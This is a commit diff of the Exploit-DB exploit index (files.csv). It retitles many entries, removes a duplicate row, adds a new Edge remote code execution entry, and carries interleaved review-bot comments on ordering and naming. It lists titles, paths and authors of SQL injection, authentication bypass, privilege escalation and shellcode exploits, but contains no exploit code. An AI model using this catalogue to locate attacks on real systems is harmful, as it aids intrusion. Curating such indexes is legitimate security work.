DB: 2017-01-06

1 new exploits

EvansFTP - (EvansFTP.ocx) Remote Buffer Overflow (PoC)
EvansFTP - 'EvansFTP.ocx' Remote Buffer Overflow (PoC)

Kaspersky 17.0.0 - Local CA root is Incorrectly Protected
Kaspersky 17.0.0 - Local CA root Incorrectly Protected
CoolPlayer 2.19 - (.Skin) Local Buffer Overflow (Python)
CUPS < 1.3.8-4 - (pstopdf filter) Privilege Escalation
CoolPlayer 2.19 - '.Skin' Local Buffer Overflow (Python)
CUPS < 1.3.8-4 - Privilege Escalation

Evans FTP - 'EvansFTP.ocx' ActiveX Control Multiple Remote Buffer Overflow Vulnerabilities

Microsoft Windows 10 Edge - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution

Phpclanwebsite 1.23.1 - (par) SQL Injection
Phpclanwebsite 1.23.1 - SQL Injection

Nukedit CMS 4.9.6 - Unauthorized Admin Add
Nukedit 4.9.6 - Unauthorized Admin Add

iyzi Forum 1.0 Beta 3 - (uye_ayrinti.asp) SQL Injection
iyzi Forum 1.0 Beta 3 - SQL Injection

Liberum Help Desk 0.97.3 - (details.asp) SQL Injection
Liberum Help Desk 0.97.3 - SQL Injection
Pligg 9.9.0 - Remote Code Execution
Pligg 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection
Pligg CMS 9.9.0 - Remote Code Execution
Pligg CMS 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection
CF_Auction - (forummessage) Blind SQL Injection
CFMBLOG - 'index.cfm categorynbr' Blind SQL Injection
CF_Auction - Blind SQL Injection
CFMBLOG - 'categorynbr' Parameter Blind SQL Injection

phpAddEdit 1.3 - (editform) Local File Inclusion
phpAddEdit 1.3 - 'editform' Parameter Local File Inclusion

MyCal Personal Events Calendar - 'mycal.mdb' Database Disclosure
MyCal Personal Events Calendar - Database Disclosure
Affiliate Software Java 4.0 - (Authentication Bypass) SQL Injection
Ad Management Java - (Authentication Bypass) SQL Injection
Banner Exchange Java - (Authentication Bypass) SQL Injection
Affiliate Software Java 4.0 - Authentication Bypass
Ad Management Java - Authentication Bypass
Banner Exchange Java - Authentication Bypass
ASP-CMS 1.0 - (index.asp cha) SQL Injection
SUMON 0.7.0 - (chg.php host) Command Execution
Xpoze 4.10 - (home.html menu) Blind SQL Injection
Social Groupie - 'group_index.php id' SQL Injection
ASP-CMS 1.0 - 'cha' Parameter SQL Injection
SUMON 0.7.0 - Command Execution
Xpoze 4.10 - 'menu' Parameter Blind SQL Injection
Social Groupie - 'id' Parameter SQL Injection

Umer Inc Songs Portal Script - 'id' SQL Injection
Umer Inc Songs Portal Script - 'id' Parameter SQL Injection
ASPired2Quote - 'quote.mdb' Remote Database Disclosure
ASP-DEV Internal E-Mail System - (Authentication Bypass) SQL Injection
ASPired2Quote - Remote Database Disclosure
ASP-DEV Internal E-Mail System - Authentication Bypass
iyzi Forum 1.0b3 - (iyziforum.mdb) Database Disclosure
CodeAvalanche FreeForum - 'CAForum.mdb' Database Disclosure
iyzi Forum 1.0b3 - Database Disclosure
CodeAvalanche FreeForum - Database Disclosure

FLDS 1.2a - (redir.php id) SQL Injection
FLDS 1.2a - 'redir.php' SQL Injection

Mediatheka 4.2 - (index.php lang) Local File Inclusion
Mediatheka 4.2 - 'lang' Parameter Local File Inclusion
Forest Blog 1.3.2 - (blog.mdb) Remote Database Disclosure
CodeAvalanche Directory - 'CADirectory.mdb' Database Disclosure
CodeAvalanche FreeForAll - 'CAFFAPage.mdb' Database Disclosure
Forest Blog 1.3.2 - Remote Database Disclosure
CodeAvalanche Directory - Database Disclosure
CodeAvalanche FreeForAll - Database Disclosure
CodeAvalanche Articles - 'CAArticles.mdb' Database Disclosure
CodeAvalanche RateMySite - 'CARateMySite.mdb' Database Disclosure
CodeAvalanche Articles - Database Disclosure
CodeAvalanche RateMySite - Database Disclosure
FLDS 1.2a - (lpro.php id) SQL Injection
BabbleBoard 1.1.6 - 'Username' Cross-Site Request Forgery/Cookie Grabber Exploit
FLDS 1.2a - 'lpro.php' SQL Injection
BabbleBoard 1.1.6 - Cross-Site Request Forgery/Cookie Grabber Exploit
The Rat CMS Alpha 2 - (Authentication Bypass) SQL Injection
XOOPS Module Amevents - 'print.php id' SQL Injection
CadeNix - 'cid' SQL Injection
The Rat CMS Alpha 2 - Authentication Bypass
XOOPS Module Amevents - SQL Injection
CadeNix - SQL Injection

CFAGCMS 1 - 'right.php title' SQL Injection
CFAGCMS 1 - SQL Injection
FaScript FaUpload - 'download.php' SQL Injection
Web Wiz Guestbook 8.21 - (WWGGuestbook.mdb) DD
FLDS 1.2a - report.php (linkida) SQL Injection
FaScript FaUpload - SQL Injection
Web Wiz Guestbook 8.21 - Database Disclosure
FLDS 1.2a - 'report.php' SQL Injection

Gnews Publisher .NET - (authors.asp authorID) SQL Injection
Gnews Publisher .NET - SQL Injection
Joomla! Component Tech Article 1.x - (item) SQL Injection
TinyMCE 2.0.1 - (index.php menuID) SQL Injection
Joomla! Component Tech Article 1.x - SQL Injection
TinyMCE 2.0.1 - 'menuID' Parameter SQL Injection

QuickerSite Easy CMS - 'QuickerSite.mdb' Database Disclosure
QuickerSite Easy CMS - Database Disclosure

I-Rater Basic - 'messages.php' SQL Injection
I-Rater Basic - SQL Injection

Injader CMS 2.1.1 - 'id' SQL Injection
Injader CMS 2.1.1 - 'id' Parameter SQL Injection
MyPHPsite - 'index.php mod' Local File Inclusion
MyPBS - 'index.php seasonID' SQL Injection
MyPHPsite - Local File Inclusion
MyPBS - 'seasonID' Parameter SQL Injection

Extract Website - 'download.php Filename' File Disclosure
Extract Website - 'Filename' Parameter File Disclosure

FreeLyrics 1.0 - (source.php p) Remote File Disclosure
FreeLyrics 1.0 - Remote File Disclosure

Userlocator 3.0 - (y) Blind SQL Injection
Userlocator 3.0 - Blind SQL Injection

chicomas 2.0.4 - Database Backup / File Disclosure / Cross-Site Scripting
Chicomas 2.0.4 - Database Backup / File Disclosure / Cross-Site Scripting

BLOG 1.55B - (image_upload.php) Arbitrary File Upload
BLOG 1.55B - 'image_upload.php' Arbitrary File Upload
RSS Simple News - 'news.php pid' SQL Injection
Text Lines Rearrange Script - 'Filename' File Disclosure
RSS Simple News - SQL Injection
Text Lines Rearrange Script - 'Filename' Parameter File Disclosure

Pligg 9.9.5b - (check_url.php url) Arbitrary File Upload / SQL Injection
Pligg 9.9.5b - Arbitrary File Upload / SQL Injection

Joomla! Component Volunteer 2.0 - (job_id) SQL Injection
Joomla! Component Volunteer 2.0 - SQL Injection
Calendar Script 1.1 - (Authentication Bypass) SQL Injection
REDPEACH CMS - (zv) SQL Injection
Calendar Script 1.1 - Authentication Bypass
REDPEACH CMS - SQL Injection

PHPLD 3.3 - (page.php name) Blind SQL Injection
PHPLD 3.3 - Blind SQL Injection

The Rat CMS Alpha 2 - 'viewarticle.php id' Blind SQL Injection
The Rat CMS Alpha 2 - Blind SQL Injection

Pligg 9.9.5 - Cross-Site Request Forgery / Protection Bypass / Captcha Bypass
Pligg CMS 9.9.5 - Cross-Site Request Forgery / Protection Bypass / Captcha Bypass

Flatnux 2009-01-27 - (Job fields) Cross-Site Scripting / Iframe Injection (PoC)
Flatnux 2009-01-27 - Cross-Site Scripting / Iframe Injection (PoC)

flatnux 2009-01-27 - Remote File Inclusion
Flatnux 2009-01-27 - Remote File Inclusion

flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure
Flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure

Pligg 9.9.0 - (editlink.php id) Blind SQL Injection
Pligg CMS 9.9.0 - 'editlink.php' Blind SQL Injection

CF Shopkart 5.3x - 'itemID' SQL Injection
CF Shopkart 5.3x - 'itemID' Parameter SQL Injection

worksimple_1.3.2 - Multiple Vulnerabilities
WorkSimple 1.3.2 - Multiple Vulnerabilities

Pligg 1.1.2 - Blind SQL Injection / Cross-Site Scripting
Pligg CMS 1.1.2 - Blind SQL Injection / Cross-Site Scripting

Constructr CMS 3.03 - MultipleRemote Vulnerabilities
Constructr CMS 3.03 - Multiple Remote Vulnerabilities

Pligg 1.1.4 - SQL Injection
Pligg CMS 1.1.4 - SQL Injection

phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (1)
phpLDAPadmin 1.2.1.1 - Remote PHP Code Injection (1)

phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (Metasploit) (2)
phpLDAPadmin 1.2.1.1 - Remote PHP Code Injection (Metasploit) (2)
OneOrZero Helpdesk 1.4 - TUpdate.php SQL Injection
OneOrZero Helpdesk 1.4 - install.php Administrative Access
OneOrZero Helpdesk 1.4 - 'TUpdate.php' SQL Injection
OneOrZero Helpdesk 1.4 - 'install.php' Administrative Access

phpLDAPadmin 0.9.6/0.9.7 - welcome.php custom_welcome_page Variable Arbitrary File Inclusion
phpLDAPadmin 0.9.6/0.9.7 - 'welcome.php' Arbitrary File Inclusion
phpLDAPadmin 0.9.8 - compare_form.php dn Parameter Cross-Site Scripting
phpLDAPadmin 0.9.8 - copy_form.php dn Parameter Cross-Site Scripting
phpLDAPadmin 0.9.8 - rename_form.php dn Parameter Cross-Site Scripting
phpLDAPadmin 0.9.8 - 'compare_form.php' Cross-Site Scripting
phpLDAPadmin 0.9.8 - 'copy_form.php' Cross-Site Scripting
phpLDAPadmin 0.9.8 - 'rename_form.php' Cross-Site Scripting
phpLDAPadmin 0.9.8 - search.php scope Parameter Cross-Site Scripting
phpLDAPadmin 0.9.8 - template_engine.php Multiple Parameter Cross-Site Scripting
phpLDAPadmin 0.9.8 - 'search.php' Cross-Site Scripting
phpLDAPadmin 0.9.8 - 'template_engine.php' Cross-Site Scripting

Pligg 9.5 - Reset Forgotten Password Security Bypass
Pligg CMS 9.5 - Reset Forgotten Password Security Bypass

Click&BaneX - Details.asp SQL Injection
Click&BaneX - 'Details.asp' SQL Injection

ChiCoMaS 2.0.4 - 'index.php' Cross-Site Scripting
Chicomas 2.0.4 - 'index.php' Cross-Site Scripting

Pligg 9.9.5 - 'CAPTCHA' Registration Automation Security Bypass
Pligg CMS 9.9.5 - 'CAPTCHA' Registration Automation Security Bypass

Pligg 1.0.4 - 'search.php' Cross-Site Scripting
Pligg CMS 1.0.4 - 'search.php' Cross-Site Scripting

Pligg 2.0.1 - Multiple Vulnerabilities
Pligg CMS 2.0.1 - Multiple Vulnerabilities

Open Journal Systems (OJS) 2.3.6 - /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php Multiple Parameter Cross-Site Scripting

Open Journal Systems (OJS) 2.3.6 - /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php Multiple Function Traversal Arbitrary File Manipulation
Open Journal Systems (OJS) 2.3.6 - 'rfiles.php' Traversal Arbitrary File Manipulation

FlatnuX CMS - controlcenter.php contents/Files Action dir Parameter Traversal Arbitrary File Access
FlatnuX CMS - Traversal Arbitrary File Access

Atlassian Confluence Jira 5.9.12 - Persistent Cross-Site Scripting
Atlassian Confluence 5.9.12 - Persistent Cross-Site Scripting
Offensive Security 2017-01-06 05:01:17 +00:00
parent 0d43a7fe09
commit 127a1da37b
5 changed files with 117 additions and 120 deletions

files.csv

@ -875,7 +875,7 @@ id,file,description,date,author,platform,type,port
7405,platforms/linux/dos/7405.c,"Linux Kernel 2.6.27.8 - ATMSVC Local Denial of Service",2008-12-10,"Jon Oberheide",linux,dos,0
7431,platforms/windows/dos/7431.pl,"Microsoft Visual Basic - ActiveX Controls mscomct2.ocx Buffer Overflow (PoC)",2008-12-12,"Jerome Athias",windows,dos,0
7454,platforms/linux/dos/7454.c,"Linux Kernel 2.6.27.7-generic / 2.6.18 / 2.6.24-1 - Local Denial of Service",2008-12-14,Adurit-T,linux,dos,0
7460,platforms/windows/dos/7460.html,"EvansFTP - (EvansFTP.ocx) Remote Buffer Overflow (PoC)",2008-12-14,Bl@ckbe@rD,windows,dos,0
7460,platforms/windows/dos/7460.html,"EvansFTP - 'EvansFTP.ocx' Remote Buffer Overflow (PoC)",2008-12-14,Bl@ckbe@rD,windows,dos,0
7467,platforms/multiple/dos/7467.txt,"Amaya Web Browser 10.0.1/10.1-pre5 - (html tag) Buffer Overflow (PoC)",2008-12-15,webDEViL,multiple,dos,0
7520,platforms/multiple/dos/7520.c,"Avahi < 0.6.24 - (mDNS Daemon) Remote Denial of Service",2008-12-19,"Jon Oberheide",multiple,dos,0
7535,platforms/hardware/dos/7535.php,"Linksys WAG54G v2 (Wireless ADSL Router) - httpd Denial of Service",2008-12-21,r0ut3r,hardware,dos,0
@ -5925,7 +5925,7 @@ id,file,description,date,author,platform,type,port
7135,platforms/windows/local/7135.htm,"Opera 9.62 - 'file://' Local Heap Overflow",2008-11-17,"Guido Landi",windows,local,0
7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - (error_log) Safe_mode Bypass",2008-11-20,SecurityReason,multiple,local,0
7177,platforms/linux/local/7177.c,"Oracle Database Vault - ptrace(2) Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0
40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA root is Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0
40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA root Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0
7264,platforms/windows/local/7264.txt,"Apache Tomcat (Windows) - runtime.getRuntime().exec() Privilege Escalation",2008-11-28,Abysssec,windows,local,0
7309,platforms/windows/local/7309.pl,"Cain & Abel 4.9.24 - '.rdp' Stack Overflow",2008-11-30,SkD,windows,local,0
7313,platforms/linux/local/7313.sh,"Debian - (symlink attack in login) Arbitrary File Ownership (PoC)",2008-12-01,"Paul Szabo",linux,local,0
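Review bot: Row 40988 (dated 2017-01-04) sits between 7177 and 7264, both from November 2008, so it is out of sequence with its neighbours in this hunk by id and by date. Since the line is being rewritten anyway, consider moving it to the position its id implies within the local section, or state the sort key if the placement is intended.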
@ -5939,8 +5939,8 @@ id,file,description,date,author,platform,type,port
7516,platforms/windows/local/7516.txt,"ESET Smart Security 3.0.672 - 'epfw.sys' Privilege Escalation",2008-12-18,"NT Internals",windows,local,0
7533,platforms/windows/local/7533.txt,"PowerStrip 3.84 - 'pstrip.sys' Privilege Escalation",2008-12-21,"NT Internals",windows,local,0
7536,platforms/windows/local/7536.cpp,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow",2008-12-21,r0ut3r,windows,local,0
7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - (.Skin) Local Buffer Overflow (Python)",2008-12-22,Encrypt3d.M!nd,windows,local,0
7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - (pstopdf filter) Privilege Escalation",2008-12-22,"Jon Oberheide",multiple,local,0
7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow (Python)",2008-12-22,Encrypt3d.M!nd,windows,local,0
7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - Privilege Escalation",2008-12-22,"Jon Oberheide",multiple,local,0
7577,platforms/windows/local/7577.pl,"Acoustica Mixcraft 4.2 - Universal Stack Overflow (SEH)",2008-12-24,SkD,windows,local,0
7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 - protosw kernel Local Privilege Escalation Exploit",2008-12-28,"Don Bailey",freebsd,local,0
7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 - '.map' Local Overwrite (SEH)",2008-12-28,Cnaph,windows,local,0
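Review bot: The new title on row 7550 drops "(pstopdf filter)" outright, whereas row 7547 in the same hunk keeps its detail and only switches the delimiter to quotes ('.Skin'). The filter name is what ties the entry to an affected component, so a title such as "CUPS < 1.3.8-4 - 'pstopdf' Filter Privilege Escalation" would keep it findable for anyone checking exposure by component.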
@ -14083,7 +14083,6 @@ id,file,description,date,author,platform,type,port
32618,platforms/php/remote/32618.txt,"plexusCMS 0.5 - Cross-Site Scripting / Remote Shell / Credentials Leak",2014-03-31,neglomaniac,php,remote,0
32643,platforms/windows/remote/32643.txt,"PhonerLite 2.14 SIP Soft Phone - SIP Digest Disclosure",2014-04-01,"Jason Ostrom",windows,remote,5060
32654,platforms/windows/remote/32654.txt,"Microsoft Internet Explorer 8 - CSS 'expression' Property Cross-Site Scripting Filter Bypass",2008-12-11,"Rafel Ivgi",windows,remote,0
32661,platforms/windows/remote/32661.html,"Evans FTP - 'EvansFTP.ocx' ActiveX Control Multiple Remote Buffer Overflow Vulnerabilities",2008-12-14,Bl@ckbe@rD,windows,remote,0
32673,platforms/multiple/remote/32673.java,"GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (1)",2008-12-05,"Jack Lloyd",multiple,remote,0
32674,platforms/multiple/remote/32674.cpp,"GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (2)",2008-12-05,"Jack Lloyd",multiple,remote,0
32681,platforms/hardware/remote/32681.txt,"COMTREND CT-536 / HG-536 Routers - Multiple Remote Vulnerabilities",2008-12-22,"Daniel Fernandez Bleda",hardware,remote,0
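Review bot: Row 32661 is deleted here (the header goes from 7 lines to 6), but the commit message does not say it is being retired as a duplicate of 7460. The two rows share author, date and the 'EvansFTP.ocx' component, yet 7460 is filed as windows/dos with a single PoC while the removed title read "Multiple Remote Buffer Overflow Vulnerabilities" under windows/remote. Please confirm 7460 covers the same content and record the retirement in the message, so references to platforms/windows/remote/32661.html can be pointed at the surviving entry.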
@ -15200,6 +15199,7 @@ id,file,description,date,author,platform,type,port
40949,platforms/cgi/remote/40949.rb,"NETGEAR WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",cgi,remote,80
40963,platforms/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",linux,remote,22
40984,platforms/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",windows,remote,0
40990,platforms/windows/remote/40990.txt,"Microsoft Windows 10 Edge - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -16028,7 +16028,7 @@ id,file,description,date,author,platform,type,port
1419,platforms/asp/webapps/1419.pl,"MiniNuke 1.8.2 - 'hid' Parameter SQL Injection",2006-01-14,DetMyl,asp,webapps,0
1442,platforms/php/webapps/1442.pl,"EZDatabase 2.0 - (db_id) Remote Command Execution",2006-01-22,cijfer,php,webapps,0
1446,platforms/php/webapps/1446.pl,"creLoaded 6.15 - (HTMLAREA) Automated Perl Exploit",2006-01-24,kaneda,php,webapps,0
1453,platforms/php/webapps/1453.pl,"Phpclanwebsite 1.23.1 - (par) SQL Injection",2006-01-25,matrix_killer,php,webapps,0
1453,platforms/php/webapps/1453.pl,"Phpclanwebsite 1.23.1 - SQL Injection",2006-01-25,matrix_killer,php,webapps,0
1457,platforms/php/webapps/1457.txt,"phpBB 2.0.19 - Cross-Site Scripting Remote Cookie Disclosure",2006-01-29,threesixthousan,php,webapps,0
1459,platforms/php/webapps/1459.pl,"xeCMS 1.0.0 RC 2 - 'cookie' Remote Command Execution",2006-01-30,cijfer,php,webapps,0
1461,platforms/php/webapps/1461.pl,"Invision Power Board Dragoran Portal Mod 1.3 - SQL Injection",2006-01-31,SkOd,php,webapps,0
@ -16251,7 +16251,7 @@ id,file,description,date,author,platform,type,port
1847,platforms/php/webapps/1847.txt,"CosmicShoppingCart - 'search.php' SQL Injection",2006-05-28,Vympel,php,webapps,0
1848,platforms/php/webapps/1848.txt,"Fastpublish CMS 1.6.9 - config[fsBase] Remote File Inclusion",2006-05-29,Kacper,php,webapps,0
1849,platforms/asp/webapps/1849.htm,"Speedy ASP Forum - 'profileupdate.asp' User Pass Change Exploit",2006-05-29,ajann,asp,webapps,0
1850,platforms/asp/webapps/1850.htm,"Nukedit CMS 4.9.6 - Unauthorized Admin Add",2006-05-29,FarhadKey,asp,webapps,0
1850,platforms/asp/webapps/1850.htm,"Nukedit 4.9.6 - Unauthorized Admin Add",2006-05-29,FarhadKey,asp,webapps,0
1851,platforms/php/webapps/1851.txt,"gnopaste 0.5.3 - 'common.php' Remote File Inclusion",2006-05-30,SmokeZ,php,webapps,0
1853,platforms/php/webapps/1853.php,"pppBlog 0.3.8 - System Disclosure",2006-05-31,rgod,php,webapps,0
1854,platforms/php/webapps/1854.txt,"Ottoman CMS 1.1.3 - '?default_path=' Remote File Inclusion (1)",2006-05-31,Kacper,php,webapps,0
@ -16669,7 +16669,7 @@ id,file,description,date,author,platform,type,port
2420,platforms/php/webapps/2420.txt,"ZoomStats 1.0.2 - 'mysql.php' Remote File Inclusion",2006-09-24,Drago84,php,webapps,0
2421,platforms/asp/webapps/2421.pl,"Spidey Blog Script 1.5 - 'proje_goster.asp' SQL Injection (2)",2006-09-24,gega,asp,webapps,0
2422,platforms/php/webapps/2422.txt,"Advaced-Clan-Script 3.4 - (mcf.php) Remote File Inclusion",2006-09-24,xdh,php,webapps,0
2423,platforms/asp/webapps/2423.txt,"iyzi Forum 1.0 Beta 3 - (uye_ayrinti.asp) SQL Injection",2006-09-24,"Fix TR",asp,webapps,0
2423,platforms/asp/webapps/2423.txt,"iyzi Forum 1.0 Beta 3 - SQL Injection",2006-09-24,"Fix TR",asp,webapps,0
2424,platforms/php/webapps/2424.txt,"SyntaxCMS 1.3 - (0004_init_urls.php) Remote File Inclusion",2006-09-24,MoHaJaLi,php,webapps,0
2427,platforms/php/webapps/2427.txt,"Polaring 0.04.03 - (general.php) Remote File Inclusion",2006-09-25,Drago84,php,webapps,0
2428,platforms/php/webapps/2428.txt,"PBLang 4.66z - (temppath) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0
@ -16995,7 +16995,7 @@ id,file,description,date,author,platform,type,port
2842,platforms/php/webapps/2842.php,"Woltlab Burning Board Lite 1.0.2 - Blind SQL Injection",2006-11-23,rgod,php,webapps,0
2843,platforms/php/webapps/2843.pl,"PHP-Nuke NukeAI Module 3b - 'util.php' Remote File Inclusion",2006-11-24,DeltahackingTEAM,php,webapps,0
2844,platforms/php/webapps/2844.pl,"Cahier de texte 2.0 - (Database Backup/Source Disclosure) Remote Exploit",2006-11-24,DarkFig,php,webapps,0
2846,platforms/asp/webapps/2846.txt,"Liberum Help Desk 0.97.3 - (details.asp) SQL Injection",2006-11-25,ajann,asp,webapps,0
2846,platforms/asp/webapps/2846.txt,"Liberum Help Desk 0.97.3 - SQL Injection",2006-11-25,ajann,asp,webapps,0
2847,platforms/php/webapps/2847.txt,"Sisfo Kampus 0.8 - Remote File Inclusion / Download",2006-11-25,"Wawan Firmansyah",php,webapps,0
2848,platforms/asp/webapps/2848.txt,"Basic Forum 1.1 - (edit.asp) SQL Injection",2006-11-25,bolivar,asp,webapps,0
2849,platforms/asp/webapps/2849.txt,"ASP-Nuke Community 1.5 - Cookie Privilege Escalation",2006-11-25,ajann,asp,webapps,0
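Review bot: Row 2846 loses "(details.asp)" rather than having it converted to the quoted form, while the context row 2848 directly below still reads "(edit.asp) SQL Injection" in the old parenthesised style. Elsewhere in this commit the file name is kept in quotes (for example 'EvansFTP.ocx' on row 7460), so either keep 'details.asp' here or apply the same rule to 2848, so that adjacent entries for the same bug class read the same way.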
@ -19274,8 +19274,8 @@ id,file,description,date,author,platform,type,port
6169,platforms/php/webapps/6169.txt,"PozScripts Classified Ads Script - 'cid' Parameter SQL Injection",2008-07-30,"Hussin X",php,webapps,0
6170,platforms/php/webapps/6170.txt,"TubeGuru Video Sharing Script - 'UID' Parameter SQL Injection",2008-07-30,"Hussin X",php,webapps,0
6171,platforms/php/webapps/6171.pl,"eNdonesia 8.4 (Calendar Module) - SQL Injection",2008-07-30,Jack,php,webapps,0
6172,platforms/php/webapps/6172.pl,"Pligg 9.9.0 - Remote Code Execution",2008-07-30,"GulfTech Security",php,webapps,0
6173,platforms/php/webapps/6173.txt,"Pligg 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection",2008-07-30,"GulfTech Security",php,webapps,0
6172,platforms/php/webapps/6172.pl,"Pligg CMS 9.9.0 - Remote Code Execution",2008-07-30,"GulfTech Security",php,webapps,0
6173,platforms/php/webapps/6173.txt,"Pligg CMS 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection",2008-07-30,"GulfTech Security",php,webapps,0
6176,platforms/php/webapps/6176.txt,"PHPX 3.5.16 - Cookie Poisoning / Login Bypass",2008-07-31,gnix,php,webapps,0
6177,platforms/php/webapps/6177.php,"Symphony 1.7.01 - (non-patched) Remote Code Execution",2008-07-31,Raz0r,php,webapps,0
6178,platforms/php/webapps/6178.php,"Coppermine Photo Gallery 1.4.18 - Local File Inclusion / Remote Code Execution",2008-07-31,EgiX,php,webapps,0
@ -20216,127 +20216,127 @@ id,file,description,date,author,platform,type,port
7411,platforms/php/webapps/7411.txt,"Butterfly ORGanizer 2.0.1 - 'id' Parameter SQL Injection",2008-12-10,Osirys,php,webapps,0
7412,platforms/asp/webapps/7412.txt,"cf shopkart 5.2.2 - SQL Injection / File Disclosure",2008-12-10,AlpHaNiX,asp,webapps,0
7413,platforms/asp/webapps/7413.pl,"CF_Calendar - 'calendarevent.cfm' SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0
7414,platforms/asp/webapps/7414.txt,"CF_Auction - (forummessage) Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0
7415,platforms/asp/webapps/7415.txt,"CFMBLOG - 'index.cfm categorynbr' Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0
7414,platforms/asp/webapps/7414.txt,"CF_Auction - Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0
7415,platforms/asp/webapps/7415.txt,"CFMBLOG - 'categorynbr' Parameter Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0
7416,platforms/asp/webapps/7416.txt,"CF_Forum - Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0
7417,platforms/php/webapps/7417.txt,"phpAddEdit 1.3 - (editform) Local File Inclusion",2008-12-10,nuclear,php,webapps,0
7417,platforms/php/webapps/7417.txt,"phpAddEdit 1.3 - 'editform' Parameter Local File Inclusion",2008-12-10,nuclear,php,webapps,0
7418,platforms/php/webapps/7418.txt,"PhpAddEdit 1.3 - 'cookie' Login Bypass",2008-12-11,x0r,php,webapps,0
7419,platforms/asp/webapps/7419.txt,"evCal Events Calendar - Database Disclosure",2008-12-11,Cyber-Zone,asp,webapps,0
7420,platforms/asp/webapps/7420.txt,"MyCal Personal Events Calendar - 'mycal.mdb' Database Disclosure",2008-12-11,CoBRa_21,asp,webapps,0
7420,platforms/asp/webapps/7420.txt,"MyCal Personal Events Calendar - Database Disclosure",2008-12-11,CoBRa_21,asp,webapps,0
7421,platforms/php/webapps/7421.txt,"EZ Publish 3.9.0/3.9.5/3.10.1 - Command Execution (Admin Required)",2008-12-11,s4avrd0w,php,webapps,0
7422,platforms/php/webapps/7422.txt,"Feed CMS 1.07.03.19b - 'lang' Local File Inclusion",2008-12-11,x0r,php,webapps,0
7423,platforms/asp/webapps/7423.txt,"Affiliate Software Java 4.0 - (Authentication Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0
7424,platforms/asp/webapps/7424.txt,"Ad Management Java - (Authentication Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0
7425,platforms/asp/webapps/7425.txt,"Banner Exchange Java - (Authentication Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0
7423,platforms/asp/webapps/7423.txt,"Affiliate Software Java 4.0 - Authentication Bypass",2008-12-11,R3d-D3V!L,asp,webapps,0
7424,platforms/asp/webapps/7424.txt,"Ad Management Java - Authentication Bypass",2008-12-11,R3d-D3V!L,asp,webapps,0
7425,platforms/asp/webapps/7425.txt,"Banner Exchange Java - Authentication Bypass",2008-12-11,R3d-D3V!L,asp,webapps,0
7426,platforms/php/webapps/7426.txt,"PHP Support Tickets 2.2 - Arbitrary File Upload",2008-12-11,ahmadbady,php,webapps,0
7427,platforms/asp/webapps/7427.txt,"The Net Guys ASPired2Poll - Remote Database Disclosure",2008-12-11,AlpHaNiX,asp,webapps,0
7428,platforms/asp/webapps/7428.txt,"The Net Guys ASPired2Protect - Database Disclosure",2008-12-12,AlpHaNiX,asp,webapps,0
7429,platforms/asp/webapps/7429.txt,"ASP-CMS 1.0 - (index.asp cha) SQL Injection",2008-12-12,"Khashayar Fereidani",asp,webapps,0
7430,platforms/php/webapps/7430.txt,"SUMON 0.7.0 - (chg.php host) Command Execution",2008-12-12,dun,php,webapps,0
7432,platforms/php/webapps/7432.txt,"Xpoze 4.10 - (home.html menu) Blind SQL Injection",2008-12-12,XaDoS,php,webapps,0
7433,platforms/php/webapps/7433.txt,"Social Groupie - 'group_index.php id' SQL Injection",2008-12-12,InjEctOr5,php,webapps,0
7429,platforms/asp/webapps/7429.txt,"ASP-CMS 1.0 - 'cha' Parameter SQL Injection",2008-12-12,"Khashayar Fereidani",asp,webapps,0
7430,platforms/php/webapps/7430.txt,"SUMON 0.7.0 - Command Execution",2008-12-12,dun,php,webapps,0
